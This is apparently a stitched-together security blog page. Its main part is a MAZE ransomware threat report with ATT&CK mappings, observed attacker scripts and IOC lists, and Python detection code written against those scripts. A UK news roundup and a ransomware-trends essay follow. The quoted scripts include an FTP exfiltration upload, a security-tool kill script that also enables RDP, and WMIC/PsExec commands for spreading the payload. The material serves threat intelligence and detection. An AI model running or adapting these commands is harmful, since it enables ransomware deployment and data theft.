              T1071: Standard Application Layer Protocol
            Exfiltration
              T1002: Data Compressed
              T1048: Exfiltration Over Alternative Protocol
            Impact
              T1486: Data Encrypted for Impact
              T1489: Service Stop

            MAZE Group 2 MITRE ATT&CK Mapping

            ATT&CK Tactic Category: Techniques

            Initial Access
              T1193: Spearphishing Attachment
            Execution
              T1059: Command-Line Interface
              T1086: PowerShell
              T1085: Rundll32
              T1064: Scripting
              T1204: User Execution
              T1028: Windows Remote Management
            Persistence
              T1078: Valid Accounts
              T1050: New Service
              T1136: Create Account
            Privilege Escalation
              T1078: Valid Accounts
              T1050: New Service
            Defense Evasion
              T1078: Valid Accounts
              T1140: Deobfuscate/Decode Files or Information
              T1107: File Deletion
              T1036: Masquerading
            Credential Access
              T1003: Credential Dumping
              T1081: Credentials in Files
              T1171: LLMNR/NBT-NS Poisoning
            Discovery
              T1087: Account Discovery
              T1482: Domain Trust Discovery
              T1083: File and Directory Discovery
              T1135: Network Share Discovery
              T1069: Permission Groups Discovery
              T1018: Remote System Discovery
              T1033: System Owner/User Discovery
            Lateral Movement
              T1076: Remote Desktop Protocol
              T1028: Windows Remote Management
            Collection
              T1074: Data Staged
              T1005: Data from Local System
              T1039: Data from Network Shared Drive
            Command and Control
              T1043: Commonly Used Port
              T1219: Remote Access Tools
              T1105: Remote File Copy
              T1071: Standard Application Layer Protocol
              T1032: Standard Cryptographic Protocol
            Exfiltration
              T1020: Automated Exfiltration
              T1002: Data Compressed
              T1048: Exfiltration Over Alternative Protocol
            Impact
              T1486: Data Encrypted for Impact

            MAZE Group 3 MITRE ATT&CK Mapping (FIN6)

            ATT&CK Tactic Category: Techniques

            Initial Access
              T1133: External Remote Services
              T1078: Valid Accounts
            Execution
              T1059: Command-Line Interface
              T1086: PowerShell
              T1064: Scripting
              T1035: Service Execution
            Persistence
              T1078: Valid Accounts
              T1031: Modify Existing Service
            Privilege Escalation
              T1055: Process Injection
              T1078: Valid Accounts
            Defense Evasion
              T1055: Process Injection
              T1078: Valid Accounts
              T1116: Code Signing
              T1089: Disabling Security Tools
              T1202: Indirect Command Execution
              T1112: Modify Registry
              T1027: Obfuscated Files or Information
              T1108: Redundant Access
              T1064: Scripting
            Credential Access
              T1003: Credential Dumping
            Discovery
              T1087: Account Discovery
              T1482: Domain Trust Discovery
              T1083: File and Directory Discovery
              T1069: Permission Groups Discovery
              T1018: Remote System Discovery
            Lateral Movement
              T1097: Pass the Ticket
              T1076: Remote Desktop Protocol
              T1105: Remote File Copy
              T1077: Windows Admin Shares
            Collection
              T1074: Data Staged
              T1039: Data from Network Shared Drive
            Command and Control
              T1043: Commonly Used Port
              T1219: Remote Access Tools
              T1105: Remote File Copy
              T1071: Standard Application Layer Protocol
              T1032: Standard Cryptographic Protocol
            Exfiltration
              T1002: Data Compressed
            Impact
              T1486: Data Encrypted for Impact
              T1490: Inhibit System Recovery
              T1489: Service Stop

            Example Commands Observed in MAZE Ransomware Incidents

            function Enum-UsersFolders($PathEnum)
            {
                $foldersArr = 'Desktop','Downloads','Documents','AppData/Roaming','AppData/Local'

                Get-ChildItem -Path $PathEnum'/c$' -ErrorAction SilentlyContinue
                Get-ChildItem -Path $PathEnum'/c$/Program Files' -ErrorAction SilentlyContinue
                Get-ChildItem -Path $PathEnum'/c$/Program Files (x86)' -ErrorAction SilentlyContinue

                foreach($Directory in Get-ChildItem -Path $PathEnum'/c$/Users' -ErrorAction SilentlyContinue) {

                    foreach($SeachDir in $foldersArr) {
                        Get-ChildItem -Path $PathEnum'/c$/Users/'$Directory'/'$SeachDir -ErrorAction SilentlyContinue
                    }
                }
            }

            PowerShell reconnaissance script used to enumerate directories

            $Dir="C:/Windows/Temp/"
            #ftp server
            $ftp = "ftp://<IP Address>/incoming/"
            $user = "<username>"
            $pass = "<password>"
            $webclient = New-Object System.Net.WebClient
            $webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass)
            #list every sql server trace file
            foreach($item in (dir $Dir "*.7z")){
               "Uploading $item..."
               $uri = New-Object System.Uri($ftp+$item.Name)
               $webclient.UploadFile($uri, $item.FullName)
            }

            Decoded FTP upload PowerShell script

            powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:43984/'); Add-FtpFile -ftpFilePath "ftp://<IP Address>/cobalt_uploads/<file name>" -localFile "<local file path>\<file name>" -userName "<username>" -password "<password>"

            Decoded FTP upload PowerShell command (second variant, staged through a loopback download cradle)
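Both decoded scripts above, and the exfiltration bullets under "Complete Mission", describe the same artifact: a PowerShell command line that is base64-encoded (or pulled through a download cradle) and pushes .7z archives to an attacker FTP server with a hard-coded credential. The following is an added detection example written for this page, not Mandiant's code and not from the original post. It decodes the -EncodedCommand form the way PowerShell does (base64 over UTF-16LE), then scores the effective script for the FTP-upload artifacts visible in the scripts above. The sample command lines are constructed; the TEST-NET address, account name and indicator names are assumptions.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed sample: the decoded FTP upload script quoted above, with invented
# values (TEST-NET address, throwaway account) in place of the redacted ones.
SAMPLE_SCRIPT = r'''$Dir="C:/Windows/Temp/"
$ftp = "ftp://203.0.113.10/incoming/"
$user = "upload"
$pass = "hunter2"
$webclient = New-Object System.Net.WebClient
$webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass)
foreach($item in (dir $Dir "*.7z")){
   $uri = New-Object System.Uri($ftp+$item.Name)
   $webclient.UploadFile($uri, $item.FullName)
}'''


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process command lines: one encoded upload script, one plaintext
# command shaped like the Add-FtpFile example above, one benign admin command.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -nop -w hidden -EncodedCommand " + encode_powershell(SAMPLE_SCRIPT),
    "powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:43984/'); "
    'Add-FtpFile -ftpFilePath "ftp://203.0.113.10/cobalt_uploads/ad.7z" -localFile "C:\\Windows\\Temp\\ad.7z" '
    '-userName "upload" -password "hunter2"',
    "powershell.exe -Command Get-Process | Sort-Object CPU -Descending",
]

# -EncodedCommand may be abbreviated (-e, -ec, -enc, ...); capture the switch and the blob.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries a valid -EncodedCommand blob."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    switch = m.group(1).lower()
    if switch != "ec" and not "encodedcommand".startswith(switch):
        return None  # e.g. -exec, -ep: a different switch that merely starts with 'e'
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Indicators drawn from the two scripts above. Names are ours.
FTP_INDICATORS = {
    "ftp_uri": re.compile(r"(?i)\bftp://"),
    "webclient_upload": re.compile(r"(?i)\.UploadFile\("),
    "archive_glob": re.compile(r"(?i)\*\.(?:7z|zip|rar)\b"),
    "ftp_helper_cmdlet": re.compile(r"(?i)\bAdd-FtpFile\b"),
    "embedded_credential": re.compile(r"(?i)NetworkCredential\(|-password\s+\S"),
    "loopback_download_cradle": re.compile(r"(?i)DownloadString\(['\"]http://127\.0\.0\.1:\d+/"),
}


def analyze(cmdline: str) -> Dict[str, object]:
    """Decode if needed, then score the effective script for FTP exfiltration indicators."""
    decoded = decode_encoded_command(cmdline)
    effective = decoded if decoded is not None else cmdline
    hits = [name for name, rx in FTP_INDICATORS.items() if rx.search(effective)]
    # An ftp:// destination plus at least one upload/credential artifact is the alert condition.
    return {
        "decoded": decoded is not None,
        "indicators": hits,
        "ftp_exfil": "ftp_uri" in hits and len(hits) >= 2,
    }


def analyze_all(cmdlines: List[str]) -> List[Dict[str, object]]:
    return [analyze(c) for c in cmdlines]


if __name__ == "__main__":
    for line, verdict in zip(SAMPLE_COMMAND_LINES, analyze_all(SAMPLE_COMMAND_LINES)):
        print(verdict["ftp_exfil"], verdict["indicators"], line[:60])
```

This runs over command-line telemetry (Sysmon Event ID 1 or Security 4688 with command-line auditing). Where PowerShell script block logging (Event ID 4104) is enabled the decoded content is already in the log and the indicator pass can be run on it directly; the loopback cradle variant never puts the script body on the command line, so for that shape the 4104 records are the only place the upload logic is visible.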

            […]
            echo 7
            echo 7
            taskkill /im csrss_tc.exe /f
            taskkill /im kwsprod.exe /f
            taskkill /im avkwctl.exe /f
            taskkill /im rnav.exe /f
            taskkill /im crssvc.exe /f
            sc config CSAuth start= disabled
            taskkill /im vsserv.exe /f
            taskkill /im ppmcativedetection.exe /f
            […]
            taskkill /im sahookmain.exe /f
            taskkill /im mcinfo.exe /f
            reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
            netsh advfirewall firewall set rule group="remote desktop" new enable=Ye
            c:\windows\temp\sss.exe

            Excerpt from windows.bat kill script

            start copy sss.exe \\<internal IP>\c$\windows\temp\
            start copy sss.exe \\<internal IP>\c$\windows\temp\

            start copy windows.bat \\<internal IP>\c$\windows\temp\
            start copy windows.bat \\<internal IP>\c$\windows\temp\

            start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

            start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

            start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

            start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

            start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

            start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

            start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

            start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

            start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

            start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

            start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

            start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

            Example commands from MAZE distribution scripts

            @echo off
            del done.txt
            del offline.txt
            rem Loop thru list of computer names in file specified on command-line
            for /f %%i in (%1) do call :check_machine %%i
            goto end
            :check_machine
            rem Check to see if machine is up.
            ping -n 1 %1|Find "TTL=" >NUL 2>NUL
            if errorlevel 1 goto down
            echo %1
            START cmd /c "copy [Location of MAZE binary] \\%1\c$\windows\temp && exit"
            timeout 1 > NUL
            echo %1 >> done.txt
            rem wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" >> done.txt
            START "" cmd /c "wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" && exit"
            goto end
            :down
              rem Report machine down
              echo %1 >> offline.txt
            :end

            Example MAZE distribution script
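The encryption procedure under "Complete Mission" and the three scripts above (windows.bat, the WMIC/PsExec distribution commands, and the ping-then-copy batch script) share a small set of process-level fingerprints: files copied into \\host\c$\windows\temp, remote process creation via wmic /node: or psexec -s, regsvr32 /i from the temp directory, RDP switched on through the registry and firewall, a burst of taskkill /im ... /f from one parent, and shadow-copy deletion (the behavior behind the "WMIC SHADOWCOPY DELETE" endpoint signature listed earlier). The block below is an added example for this page, our code rather than Mandiant's, that turns those fingerprints into per-event rules and adds the two correlations that separate a deployment run from routine administration: fan-out of distinct remote targets from one source host, and taskkill bursts from one parent. The telemetry is constructed; host names, addresses, the account name, rule names and both thresholds are assumptions.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set


@dataclass
class ProcEvent:
    """Process-creation record (Sysmon Event ID 1, or Security 4688 with command-line auditing)."""
    host: str          # computer the process started on
    parent_image: str
    image: str
    cmdline: str


# Per-event patterns lifted from the windows.bat and distribution scripts above.
# Rule names are ours; "enable=ye" also matches the truncated form in the excerpt.
RULES = {
    "remote_wmic_process_create": re.compile(r"(?i)\bwmic(?:\.exe)?\b.*/node:.*process\s+call\s+create"),
    "psexec_service_exec_from_temp": re.compile(r"(?i)\bpsexec(?:\.exe)?\b.*\s-s\b.*\\windows\\temp\\"),
    "admin_share_staging_copy": re.compile(r"(?i)\bcopy\b.*\\\\[^\\\s]+\\c\$\\windows\\temp"),
    "regsvr32_from_temp": re.compile(r"(?i)\bregsvr32(?:\.exe)?\s+/i\s+c:\\windows\\temp\\"),
    "rdp_enabled_via_registry": re.compile(r"(?i)\breg\s+add\b.*fDenyTSConnections.*\s/d\s+0\b"),
    "rdp_firewall_rule_enabled": re.compile(r'(?i)netsh\s+advfirewall\s+firewall\s+set\s+rule\s+group="remote desktop".*enable=ye'),
    "shadow_copy_delete": re.compile(r"(?i)\bwmic(?:\.exe)?\b.*shadowcopy\s+delete"),
    "security_tool_taskkill": re.compile(r"(?i)\btaskkill(?:\.exe)?\s+/im\s+\S+\s+/f\b"),
}
DEPLOYMENT_RULES = {"remote_wmic_process_create", "psexec_service_exec_from_temp", "admin_share_staging_copy"}
AGGREGATE_ONLY = {"security_tool_taskkill"}  # one taskkill is noise; a burst from one parent is the kill script

# Where the command names the remote host: wmic /node:, psexec \\host, or the \\host\c$ share path.
TARGET_RES = [
    re.compile(r'(?i)/node:"?([^"\s]+)'),
    re.compile(r"(?i)\bpsexec(?:\.exe)?\s+\\\\([^\s\\]+)"),
    re.compile(r'(?i)\\\\([^\\\s"]+)\\c\$'),
]


def match_rules(ev: ProcEvent) -> List[str]:
    return [name for name, rx in RULES.items() if rx.search(ev.cmdline)]


def target_host(cmdline: str) -> Optional[str]:
    for rx in TARGET_RES:
        m = rx.search(cmdline)
        if m:
            return m.group(1).lower()
    return None


def detect(events: List[ProcEvent], fanout_threshold: int = 5, taskkill_threshold: int = 5) -> Dict[str, list]:
    """Per-event hits plus two correlations: deployment fan-out per source host and taskkill bursts."""
    per_event: List[dict] = []
    fanout: Dict[str, Set[str]] = defaultdict(set)
    taskkills: Dict[tuple, int] = defaultdict(int)
    for ev in events:
        hits = match_rules(ev)
        for name in hits:
            if name not in AGGREGATE_ONLY:
                per_event.append({"rule": name, "host": ev.host, "image": ev.image, "cmdline": ev.cmdline})
        if any(h in DEPLOYMENT_RULES for h in hits):
            target = target_host(ev.cmdline)
            if target and target != ev.host.lower():
                fanout[ev.host].add(target)
        if "security_tool_taskkill" in hits:
            taskkills[(ev.host, ev.parent_image.lower())] += 1
    aggregates = []
    for host, targets in fanout.items():
        if len(targets) >= fanout_threshold:
            aggregates.append({"rule": "mass_remote_deployment", "host": host, "targets": sorted(targets)})
    for (host, parent), n in taskkills.items():
        if n >= taskkill_threshold:
            aggregates.append({"rule": "kill_script_bulk_taskkill", "host": host, "parent": parent, "count": n})
    return {"per_event": per_event, "aggregates": aggregates}


CMD = r"C:\Windows\System32\cmd.exe"
WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
# Constructed telemetry: an operator box pushing sss.exe/windows.bat to seven targets,
# one target running the kill script, and benign noise that must stay quiet.
SAMPLE_EVENTS = (
    [ProcEvent("WS-ADMIN01", CMD, CMD, rf"cmd /c copy sss.exe \\10.10.1.{n}\c$\windows\temp") for n in range(11, 17)]
    + [ProcEvent("WS-ADMIN01", CMD, WMIC, rf'wmic /node:"10.10.1.{n}" /user:"CORP\svc_backup" /password:"********" process call create "c:\windows\temp\sss.exe"') for n in range(11, 17)]
    + [ProcEvent("WS-ADMIN01", CMD, r"C:\Users\Public\psexec.exe", r'psexec.exe \\10.10.1.17 -u CORP\svc_backup -p "********" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat')]
    + [ProcEvent("SRV-FILE02", CMD, r"C:\Windows\System32\taskkill.exe", f"taskkill /im {p} /f") for p in ("csrss_tc.exe", "kwsprod.exe", "avkwctl.exe", "rnav.exe", "crssvc.exe", "vsserv.exe")]
    + [
        ProcEvent("SRV-FILE02", CMD, r"C:\Windows\System32\reg.exe", r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
        ProcEvent("SRV-FILE02", CMD, r"C:\Windows\System32\netsh.exe", 'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'),
        ProcEvent("SRV-FILE02", CMD, r"C:\Windows\System32\regsvr32.exe", r"regsvr32.exe /i C:\windows\temp\sss.dll"),
        ProcEvent("SRV-FILE02", r"C:\Windows\Temp\sss.exe", WMIC, "wmic shadowcopy delete"),
        ProcEvent("WS-ADMIN01", CMD, WMIC, "wmic os get caption"),
        ProcEvent("WS-ADMIN01", r"C:\Windows\explorer.exe", CMD, r"cmd /c copy report.xlsx \\fs01\shared\finance"),
        ProcEvent("WS-USER07", r"C:\Windows\explorer.exe", r"C:\Windows\System32\taskkill.exe", "taskkill /im notepad.exe /f"),
    ]
)

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS)["aggregates"]:
        print(alert)
```

The fan-out rule is the one worth tuning: software-distribution and patching servers legitimately create processes on hundreds of hosts, so scope it by excluding those sources rather than by raising the threshold, since the deployment scripts above hit tens to thousands of hosts in a single run. The per-event rules for fDenyTSConnections, the "remote desktop" firewall group and shadow-copy deletion fire on single events and should page on servers regardless of the source.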

            Indicators of Compromise

            Maze Payloads (MD5)

            064058cf092063a5b69ed8fd2a1a04fe
            0f841c6332c89eaa7cac14c9d5b1d35b
            108a298b4ed5b4e77541061f32e55751
            11308e450b1f17954f531122a56fae3b
            15d7dd126391b0e7963c562a6cf3992c
            21a563f958b73d453ad91e251b11855c
            27c5ecbb94b84c315d56673a851b6cf9
            2f78ff32cbb3c478865a88276248d419
            335aba8d135cc2e66549080ec9e8c8b7
            3bfcba2dd05e1c75f86c008f4d245f62
            46b98ee908d08f15137e509e5e69db1b
            5774f35d180c0702741a46d98190ff37
            5df79164b6d0661277f11691121b1d53
            658e9deec68cf5d33ee0779f54806cc2
            65cf08ffaf12e47de8cd37098aac5b33
            79d137d91be9819930eeb3876e4fbe79
            8045b3d2d4a6084f14618b028710ce85
            8205a1106ae91d0b0705992d61e84ab2
            83b8d994b989f6cbeea3e1a5d68ca5d8
            868d604146e7e5cb5995934b085846e3
            87239ce48fc8196a5ab66d8562f48f26
            89e1ddb8cc86c710ee068d6c6bf300f4
            910aa49813ee4cc7e4fa0074db5e454a
            9eb13d56c363df67490bcc2149229e4c
            a0c5b4adbcd9eb6de9d32537b16c423b
            a3a3495ae2fc83479baeaf1878e1ea84
            b02be7a336dcc6635172e0d6ec24c554
            b40a9eda37493425782bda4a3d9dad58
            b4d6cb4e52bb525ebe43349076a240df
            b6786f141148925010122819047d1882
            b93616a1ea4f4a131cc0507e6c789f94
            bd9838d84fd77205011e8b0c2bd711e0
            be537a66d01c67076c8491b05866c894
            bf2e43ff8542e73c1b27291e0df06afd
            c3ce5e8075f506e396ee601f2757a2bd
            d2dda72ff2fbbb89bd871c5fc21ee96a
            d3eaab616883fcf51dcbdb4769dd86df
            d552be44a11d831e874e05cadafe04b6
            deebbea18401e8b5e83c410c6d3a8b4e
            dfa4631ec2b8459b1041168b1b1d5105
            e57ba11045a4b7bc30bd2d33498ef194
            e69a8eb94f65480980deaf1ff5a431a6
            ef95c48e750c1a3b1af8f5446fa04f54
            f04d404d84be66e64a584d425844b926
            f457bb5060543db3146291d8c9ad1001
            f5ecda7dd8bb1c514f93c09cea8ae00d
            f83cef2bf33a4d43e58b771e81af3ecc
            fba4cbb7167176990d5a8d24e9505f71

            Maze Check-in IPs

            91.218.114.11

            91.218.114.25

            91.218.114.26

            91.218.114.31

            91.218.114.32

            91.218.114.37

            91.218.114.38

            91.218.114.4

            91.218.114.77

            91.218.114.79

            92.63.11.151

            92.63.15.6 

            92.63.15.8 

            92.63.17.245

            92.63.194.20

            92.63.194.3

            92.63.29.137

            92.63.32.2 

            92.63.32.52

            92.63.32.55

            92.63.32.57

            92.63.37.100

            92.63.8.47

            Maze-related Domains

            aoacugmutagkwctu[.]onion

            mazedecrypt[.]top 

            mazenews[.]top

            newsmaze[.]top

            Maze Download URLs

            http://104.168.174.32/wordupd_3.0.1.tmp

            http://104.168.198.208/wordupd.tmp

            http://104.168.201.35/dospizdos.tmp

            http://104.168.201.47/wordupd.tmp

            http://104.168.215.54/wordupd.tmp

            http://149.56.245.196/wordupd.tmp

            http://192.119.106.235/mswordupd.tmp

            http://192.119.106.235/officeupd.tmp

            http://192.99.172.143/winupd.tmp

            http://54.39.233.188/win163.65.tmp

            http://91.208.184.174:8079/windef.exe

            http://agenziainformazioni[.]icu/wordupd.tmp

            http://www.download-invoice[.]site/Invoice_29557473.exe

            Malicious Documents

            1a26c9b6ba40e4e3c3dce12de266ae10

            53d5bdc6bd7904b44078cf80e239d42b

            79271dc08052480a578d583a298951c5

            a2d631fcb08a6c840c23a8f46f6892dd

            ad30987a53b1b0264d806805ce1a2561

            c09af442e8c808c953f4fa461956a30f

            ee26e33725b14850b1776a67bd8f2d0a

            BEACON C2s

            173.209.43.61

            193.36.237.173

            37.1.213.9

            37.252.7.142

            5.199.167.188

            checksoffice[.]me

            drivers.updatecenter[.]icu

            plaintsotherest[.]net

            thesawmeinrew[.]net

            updates.updatecenter[.]icu

            Cobalt Strike Binaries

            7507fe19afbda652e9b2768c10ad639f

            a93b86b2530cc988f801462ead702d84

            4f57e35a89e257952c3809211bef78ea

            bad6fc87a98d1663be0df23aedaf1c62

            f5ef96251f183f7fc63205d8ebf30cbf

            c818cc38f46c604f8576118f12fd0a63

            078cf6db38725c37030c79ef73519c0c

            c255daaa8abfadc12c9ae8ae2d148b31

            1fef99f05bf5ae78a28d521612506057

            cebe4799b6aff9cead533536b09fecd1

            4ccca6ff9b667a01df55326fcc850219

            bad6fc87a98d1663be0df23aedaf1c62

            Meterpreter C2s

            5.199.167.188

            Other Related Files

            3A5A9D40D4592C344920DD082029B362 (related script)

            76f8f28bd51efa03ab992fdb050c8382 (MAZE execution artifact)

            b5aa49c1bf4179452a85862ade3ef317 (windows.bat kill script) 

            fad3c6914d798e29a3fd8e415f1608f4 (related script)

            Tools & Utilities

            27304b246c7d5b4e149124d5f93c5b01 (PsExec)

            42badc1d2f03a8b1e4875740d3d49336 (7zip)

            75b55bb34dac9d02740b9ad6b6820360 (PsExec)

            9b02dd2a1a15e94922be3f85129083ac (AdFind)

            c621a9f931e4ebf37dace74efcce11f2 (SMBTools)

            f413b4a2242bb60829c9a470eea4dfb6 (winRAR) 

            Email Sender Domains

            att-customer[.]com

            att-information[.]com

            att-newsroom[.]com

            att-plans[.]com

            bezahlen-1und1[.]icu

            bzst-info[.]icu

            bzst-inform[.]icu

            bzstinfo[.]icu

            bzstinform[.]icu

            canada-post[.]icu

            canadapost-delivery[.]icu

            canadapost-tracking[.]icu

            hilfe-center-1und1[.]icu

            hilfe-center-internetag[.]icu

            trackweb-canadapost[.]icu

            Sender Domain Registrant Addresses

            abusereceive@hitler.rocks

            gladkoff1991@yandex.ru

            Mandiant Threat Intelligence will host an exclusive webinar on Thursday, May 21, 2020, at 8 a.m. PT / 11 a.m. ET to provide updated insight and information into the MAZE ransomware threat, and to answer questions from attendees. Register today to reserve your spot.

            Cyber Security Roundup for May 2020

            A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, April 2020.

            As widely reported, UK foreign exchange firm Travelex's business operations were brought to a standstill after its IT systems were severely hit by the Sodinokibi ransomware at the start of the year. It was reported that the REvil group were behind the attack and had stolen 5Gbs of customer personal data, then demanded $6 million (£4.6m) in ransom. The Wall Street Journal reported in April 2020 that Travelex had reached a deal, paying $2.3 million (£1.84m) in Bitcoin to the cybercriminals. This sort of response incentivises future ransomware activity against all other businesses and could lead to inflation of future cyber-extortion demands, in my opinion.

            Cognizant, a large US digital solutions provider and IT consultancy, was reportedly hit by the Maze ransomware. Maze, previously known as the 'ChaCha' ransomware, like the Travelex attack not only encrypts victims' files but steals sensitive data from the IT systems as well, enabling the bad guys to threaten to publish the stolen data unless the organisation coughs up to their cyber-extortion demands; the bad guys are very much rinsing and repeating lucrative attacks.

            Microsoft wrote an excellent blog covering the 'motley crew' of ransomware payloads. The payloads it covers are said to be straining security operations, especially in healthcare, and Microsoft urged security teams to look for the signs of credential theft and lateral movement that herald attacks.

            Researchers continue to be busy exposing large sensitive datasets within misconfigured cloud services. In April, researchers reported 14 million Ring user details exposed in a misconfigured AWS database, fitness software Kinomap had 42 million user details exposed in another misconfigured database, and Maropost had 95 million users exposed, also in a misconfigured database.

            Nintendo confirmed 160,000 of its users' accounts had been accessed, exposing PII and Nintendo store accounts. The gaming giant said that from April, user accounts were accessed through the Nintendo Network ID (NNID), which is primarily used for Switch gaming. The company is unaware of exactly how the intrusion occurred, saying it "seems to have been made by impersonating login to Nintendo Network ID". "If you use the same password for your NNID and Nintendo account, your balance and registered credit card / PayPal may be illegally used at My Nintendo Store or Nintendo eShop. Please set different passwords for NNID and Nintendo account," Nintendo said. In response, the company has abolished users' ability to log into their Nintendo account via NNID, passwords for both NNID and Nintendo accounts are being reset, and the company recommends multi-factor authentication be set up for each account. The account breaches weren't the only cyber issue affecting Nintendo in April: it was reported that a bot, dubbed 'Bird Bot', was used by a reseller to buy up Nintendo Switches before customers could purchase them from Nintendo. The reseller benefits at consumers' expense: by buying up all available Switches directly from Nintendo, they can sell them on at higher prices for a quick and tidy profit, given the current high demand for Switches and lack of supply.

            April was a busy month for security updates: Microsoft released security patches fixing 113 vulnerabilities on Patch Tuesday and an out-of-band patch for Teams found by researchers at CyberArk. Patch Tuesday was a quiet one for Adobe, though it released fixes for 21 critical vulnerabilities in Illustrator and Bridge at the end of the month. Oracle released a huge 397 fixes for 450 CVEs in over 100 products, which I think is a new record for a patch release!

            Sophos said it and its customers were attacked when a previously unknown SQL injection vulnerability in their physical and virtual XG Firewall units was exploited. "The attack affected systems configured with either the administration interface (HTTPS admin service) or the user portal exposed on the WAN zone. In addition, firewalls manually configured to expose a firewall service (e.g. SSL VPN) to the WAN zone that shares the same port as the admin or User Portal were also affected," Sophos said.

            There were security-critical patch releases for Mozilla Firefox, Chrome (twice), and for 8 Cisco products. A bunch of VMware patches were also released, including one for a vulnerability scored CVSS 10 (the highest possible) in vCenter, a critical one in vRealize Log Insight and a critical cross-site scripting vulnerability in ESXi 6.5 and 6.7. And finally, on the patch front, Intel decided to discontinue multiple products, as it was unable to keep ahead of patching their vulnerabilities.

            Stay safe, stay home and watch for the scams.


              Cybersecurity Trends

              Trends are interesting because they can tell you where things are going.

              I do believe in studying history and behaviours in order to figure out where things are going, so every year my colleagues from Yoroi and I spend several weeks studying and writing down what we observed during the past months in the Yoroi Cybersecurity Annual Report (freely downloadable here: Yoroi Cybersecurity Report 2019).

              The Rise of Targeted Ransomware

              2019 was a breakthrough year for the cyber security of the European productive sector. The peculiarity of this year is not strictly related to the number of hacking attempts or to the malware code spread all over the Internet to compromise companies' assets and data, but to the evolution and consolidation of a new, highly dangerous kind of cyber attack. In 2019, we noticed a deep change in a consistent part of the global threat landscape, typically populated by state-sponsored actors, cyber-criminals and hacktivists, each having its own attributes in motivations, objectives, methods and sophistication.

              During 2019 we observed a rapid evolution of the cyber crime ecosystems hosting a wide range of financially motivated actors, and an increased volume of money-driven attacks compared to previous years. These actors are also involved in cyber-espionage, CEO fraud, credential-stealing operations, and PII (Personally Identifiable Information) and IP (Intellectual Property) theft, but are traditionally much more active in so-called "opportunistic" cyber attacks: attacks directed at the whole internet population, such as botnet and crypto-miner infection waves, but also regional operations, for instance those designed to target European countries like Italy or Germany as branches of major global-scale operations, as we have tracked since 2018 with the sLoad case and even earlier with the Ursnif malware propagation waves.
              In 2019, as in 2018, ransomware attacks played a significant role in the cyber arena. In previous years the whole InfoSec community observed the fast growth of the ransomware phenomenon, both in terms of newborn ransomware families and in ransom payment options, driven by the consolidation of the digital cryptocurrency market, which made the traditional tracking techniques operated by law enforcement agencies less effective because of new untrackable cryptocurrencies. But these increasing volumes weren't the most worrying aspect we noticed.

              Before 2019, most ransomware attacks were conducted in an automated, mostly opportunistic fashion: for instance through drive-by download attacks and exploit kits, but also very frequently using the email vector. In fact, the "canonical" ransomware attack before 2019 was characterized by an incoming email luring the victim to open an attachment, most of the time an Office document, carefully obfuscated to avoid detection and weaponized to launch ransomware able to autonomously encrypt local user files and shared documents.

